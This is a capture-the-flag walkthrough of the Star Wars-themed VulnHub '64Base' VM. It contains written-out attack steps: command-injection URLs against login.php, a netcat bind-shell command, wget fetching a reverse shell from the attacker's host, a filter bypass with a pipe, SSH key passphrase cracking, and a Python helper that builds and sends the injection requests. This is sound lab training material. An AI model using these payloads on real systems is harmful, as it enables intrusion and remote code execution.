[VULNHUB] 64Base: 1.0.1

An unexpected Star Wars-themed VM from VulnHub (I really love Star Wars). It is beautiful, and I got trolled too! Let's see what I did.

FLAG 1

First of all, I scanned for open ports:

nmap 192.168.1.16 -p 1-65535 -sV

This is the output:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-20 18:43 CET
Nmap scan report for 192.168.1.16
Host is up (0.0092s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE    VERSION
80/tcp    open  http       Apache httpd 2.4.10 ((Debian))
4899/tcp  open  tcpwrapped
62964/tcp open  ssh        OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.70 seconds

Then I scanned port 80 with Nikto:

nikto -h 192.168.1.16

I truncated the output because robots.txt was full of entries:

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.16
+ Target Hostname:    192.168.1.16
+ Target Port:        80
+ Start Time:         2016-12-20 18:44:08 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1fdf 0x542f6bd9b68a0 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/88888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/88888888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/88888888888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/88888888888P/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/c3P08P/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/C3p0/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/A280/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/above/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/AC1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/across/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/activation/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Adjustments/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/after/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/against/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/ago/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Pack/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Parking/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
...
+ Entry '/Y888888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Y888888888P/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Y8b/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Yard/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Zero/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/ZZ/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 429 entries which should be manually viewed.
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /members/: This might be interesting...
+ OSVDB-3092: /order/: This might be interesting...
+ OSVDB-3092: /staff/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /as/: This might be interesting... potential country code (American Samoa)
+ OSVDB-3092: /by/: This might be interesting... potential country code (Belarus)
+ OSVDB-3092: /is/: This might be interesting... potential country code (Iceland)
+ OSVDB-3092: /no/: This might be interesting... potential country code (Norway)
+ OSVDB-3092: /to/: This might be interesting... potential country code (Tonga)
+ 8115 requests: 0 error(s) and 434 item(s) reported on remote host
+ End Time:           2016-12-20 18:44:21 (GMT1) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The only interesting directory seemed to be /admin, but it required HTTP basic authentication and I didn't have a username or password. So I analyzed the source code of the index page and discovered this:

5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a

It looks like a hex-encoded string, so I decoded it:

echo "5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a" | xxd -p -r

This is the decoded string:

ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg==

This is base64, so I decoded it:

echo "ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg==" | base64 -d

That gave me the first flag, and decoding the base64 content inside it I got:

64base:Th353@r3N0TdaDr01DzU@reL00K1ing4

Cool! Now I have a username and a password.

FLAG 2

I tried the credentials on /admin without success. I spent many hours looking for the right way forward and in the end, reading the post on the blog, I found this:

Only respond if you are a real Imperial-Class BountyHunter

The string Imperial-Class was already familiar: it was in the robots.txt file, but with a lowercase c (maybe a typo). So I browsed to http://192.168.1.16/Imperial-Class and used the credentials I had found for the HTTP basic authentication. I got an error on the index page:

[☠] ERROR: incorrect path!.... TO THE DARK SIDE!

I looked into the source code and I found this:

don't forget the BountyHunter login

So I browsed to http://192.168.1.16/Imperial-Class/BountyHunter and a login form appeared. I used the same credentials as for the previous authentication, but nothing changed. I looked at the source code of the page and found three strings:

5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756
584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32
52714d544a54626d51315a45566157464655614446525557383966516f3d0a

I joined them into a single string:

5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a

And I decoded it from hex:

echo "5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a" | xxd -p -r

I got this:

ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWVXOTFkSFZpWlM1amIyMHZkMkYwWTJnL2RqMTJTbmQ1ZEVaWFFUaDFRUW89fQo=

Then I decoded it from base64:

echo "ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWVXOTFkSFZpWlM1amIyMHZkMkYwWTJnL2RqMTJTbmQ1ZEVaWFFUaDFRUW89fQo=" | base64 -d

And I got the second flag.

FLAG 3

I got the third flag with a lot of luck. At this point I had no idea how to go further, so I tried curl on login.php:

curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.1.16/Imperial-Class/BountyHunter/login.php"

And I got the third flag as output. Decoding its content from base64 gave me:

53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id

It looks like a command injection vulnerability: f is the name of a PHP function (exec) and c is the argument, the command, passed to it.

FLAG 4

So I browsed to http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=exec&c=id but I didn't get the expected output. Then I remembered the image in the blog post which says "IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377". That makes sense: PHP's exec() only returns the last line of output and prints nothing by itself, while system() prints the command output directly. So I changed the URL to:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=id

I got the expected output and flag4 too. Decoding its content I found another set of credentials:

64base:64base5h377

FLAG 5

Now I needed to get a shell, so I tried:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=nc -lvp 1234 -e /bin/bash

But I got trolled:

░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▄▄███░░░░░
░░▄▄░░░░░░░░░░░░░░░░░░░░░░░░░███████░░░░
░░███▄░░░░░░░░░░░░░░░░░░░░░▄█████▀░█░░░░
░░▀█████▄▄▄▄▀▀▀▀▀▀▀▀░▄▄▄▄▄███▀▀░▀███░░░░
░░░░███▀▀░░░░░░░░░░░░░░▀▀▀███░░░░██▀░░░░
░░░░██░░░░░░▄░░░░░░░░░░░░░░░▀▀▄▄███░░░░░
░░░░▄█▄▄████▀█░█▄██▄▄░░░░░░░░░████▀░░░░░
░░░▄████████░░░██████▄▄▄▄░░░░░████░░░░░░
░░░███░█░▀██░░░▀███░█░░███▄▄░░░░▀█░░░░░░
░░░████▄███▄▄░░░███▄▄▄█████▀░░░░░██░░░░░
░░▄████▀▀░▀██▀░░░▀█████████░░░░░░██░░░░░
░░▀███░░░▄▄▀▀▀▄▄░░░░▀██████░░░░░░░█░░░░░
░░░███░░█░░░░░░░▀░░░░▀███▀░░░░░░░░█░░░░░
░░░████▄▀░░░░░░░░▀░░░████▄░░░░░░░░░█░░░░
░░░██████▄░░░░░░░░░▀▀████▀░░░░░░░░░█░░░░
░░▄█████████▀▀▀▀░░░░░░░░░░░░░░░░░░░▀█░░░
░░███████████▄▄▄▄░░░░░░░░░░░░░░░░░░░█▄░░
░░████████▀▀▀▀▀▀░░░░░░░░░░░░░░░░░░░░░█▄░
░░████████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░█░
░▄███████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░░░█
░▀▀▀▀▀▀▀▀▀█▀▀▀░░░░░░░░░░░░░░░░░░░░░░░░░█
Is this the net cat you are looking for?

LOL! So I tried to download a PHP reverse shell (the pentestmonkey one) from my local Apache server:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=wget "http://192.168.1.4/shell.php"

I listed the files, but the command didn't seem to have worked. So I tried to download it recursively:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=wget -r "http://192.168.1.4"

This command didn't work either. So I tried to dump the argument with the PHP var_dump function:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=var_dump&c=wget -r "http://192.168.1.4"

And I got:

';cat.real /etc/issue;date;uname -a;/sbin/ifconfig eth0|/usr/share/grep.real inet;echo sudo -u 64base wget -r http192.168.1.4"

OK, I changed the URL a bit to avoid the characters that were being mangled:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=var_dump&c=wget -r 192.168.1.4

The output was correct, so I tried system again, but when I listed the files nothing had been downloaded. So I needed to break out of the 64base wrapper, which seems to filter some commands. I tried with | and it worked:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=escape|wget -r 192.168.1.4
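The payload travels in a query string, so the spaces, quotes and the | in the URLs above only work because the browser percent-encodes them for you; when the same requests are sent with curl or a script they have to be encoded by hand, and an unencoded & inside c would be split off as a new parameter. This added helper (mine, not part of the original post) builds the f=/c= requests with proper encoding and the same Basic header that curl -u sends. The target URL and the credentials are the ones found earlier in this writeup; fetch() needs network access to the VM and is not exercised offline.

```python
import base64
import urllib.request
from urllib.parse import quote, urlencode

# Values taken from the writeup above.
LOGIN_PHP = "http://192.168.1.16/Imperial-Class/BountyHunter/login.php"
USER, PASSWORD = "64base", "Th353@r3N0TdaDr01DzU@reL00K1ing4"


def basic_auth_header(user: str = USER, password: str = PASSWORD) -> str:
    """Value of the Authorization header that curl -u sends: Basic + base64(user:password)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def build_injection_url(func: str, cmd: str, base: str = LOGIN_PHP) -> str:
    """Percent-encode f= and c= so spaces, quotes, '|' and '&' in the command
    reach login.php unchanged. quote_via=quote turns a space into %20 rather
    than '+', so the command cannot be misread by the server."""
    return f"{base}?{urlencode({'f': func, 'c': cmd}, quote_via=quote)}"


def fetch(func: str, cmd: str, timeout: float = 10.0) -> str:
    """Send one authenticated GET to the VM and return the response body (network required)."""
    req = urllib.request.Request(
        build_injection_url(func, cmd),
        headers={"Authorization": basic_auth_header()},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    # The requests from this writeup, printed in encoded form without sending them.
    for f, c in [
        ("exec", "id"),
        ("system", "id"),
        ("var_dump", "wget -r 192.168.1.4"),
        ("system", "escape|wget -r 192.168.1.4"),
    ]:
        print(build_injection_url(f, c))
    print(basic_auth_header())
```

Note that the token in the Authorization header is exactly the base64 string that was inside flag1 (minus the trailing newline it carried), which is why the first flag was the key to the whole /Imperial-Class area.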

Now I had shell.php inside the 192.168.1.4 folder (wget -r mirrors into a directory named after the host). Then I started listening locally:

nc -lvp 1234

Then I browsed to http://192.168.1.16/Imperial-Class/BountyHunter/192.168.1.4/shell.php and got a shell! Then I searched for the flag:

find / -name "*flag*" 2>/dev/null

And I got it:

/var/www/html/admin/flag5{TG9vayBJbnNpZGUhIDpECg==}

FLAG 6

Flag5 was a file, so I changed directory to /var/www/html/admin and typed:

python -m SimpleHTTPServer 8080

Then I downloaded the file from http://192.168.1.16:8080 and checked with the file command that it was a JPEG image. So I extracted some information with exiftool, in particular the comment:

4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c517051636d39

I decoded it from hex and then from base64 and got an SSH private key. I tried to connect over SSH, but the key had a passphrase. So I used phrasendrescher to crack it:

pd pkey -d rockyou.txt -K key

The cracked passphrase was usetheforce. So I tried to connect over SSH again:

ssh root@192.168.1.16 -p 62964 -i key

It worked! And I got the last flag. Decoding it alternately from hex and base64 a few times, I got the secret plans of the Black Star. And with that I finished the VM too…
